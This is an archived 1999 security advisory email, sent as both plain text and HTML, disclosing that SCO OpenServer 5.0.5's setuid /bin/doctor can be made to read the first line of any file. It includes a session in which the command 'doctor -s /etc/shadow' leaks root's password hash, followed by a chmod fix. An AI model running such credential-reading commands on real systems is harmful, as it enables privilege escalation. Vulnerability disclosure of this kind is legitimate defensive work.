Date: Tue, 7 Sep 1999 10:44:42 -0500
From: Brock Tellier <[email protected]>
To: [email protected]Subject: SCO OpenServer 5.0.5 /bin/doctor root compromise
This is a multi-part message in MIME format.
------=_NextPart_000_017D_01BEF91D.FE5629A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Greetings,
INFO:
There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and =
probably others. By supplying a doctor script file you can read the =
first partial line of any file on the system (good enough for =
/etc/shadow). Example:
scobox:/bin$ id
uid=3D136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name =
"root:xbfOLR0ekXN/o:10656::"
scobox:/bin$
And so on.
FIX:=20
Just chmod -s until SCO comes out with a fix. Although I certianly =
won't be changing it back to suid root anytime soon. If a hole like =
this exists, there are undoubtedly countless more lurking within. =20
Brock Tellier
Systems Administrator
Webley Systems
------=_NextPart_000_017D_01BEF91D.FE5629A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>Greetings,</DIV>
<DIV> </DIV>
<DIV><BR>INFO:<BR> There is a local root comprimise in SCO 5.0.5's=20
/bin/doctor 2.0.0e2 and probably others. By supplying a doctor =
script file=20
you can read the first partial line of any file on the system (good =
enough for=20
/etc/shadow). Example:</DIV>
<DIV> </DIV>
<DIV>scobox:/bin$ id<BR>uid=3D136(btellier),200(users)<BR>scobox:/bin$ =
uname=20
-a<BR>SCO_SV scobox 3.2 5.0.5 i386<BR>scobox:/bin$ doctor -V<BR>doctor =
2.0.0e=20
2<BR>scobox:/bin$ doctor -s /etc/shadow<BR>doctor: WARNING User message: =
invalid=20
command name "root:xbfOLR0ekXN/o:10656::"<BR>scobox:/bin$</DIV>
<DIV> </DIV>
<DIV>And so on.</DIV>
<DIV> </DIV>
<DIV>FIX: <BR> Just chmod -s until SCO comes out with a fix. =
Although=20
I certianly won't be changing it back to suid root anytime soon. =
If a hole=20
like this exists, there are undoubtedly countless more lurking =
within. =20
</DIV>
<DIV> </DIV>
<DIV>Brock Tellier<BR>Systems Administrator<BR>Webley=20
Systems</DIV></BODY></HTML>
------=_NextPart_000_017D_01BEF91D.FE5629A0--
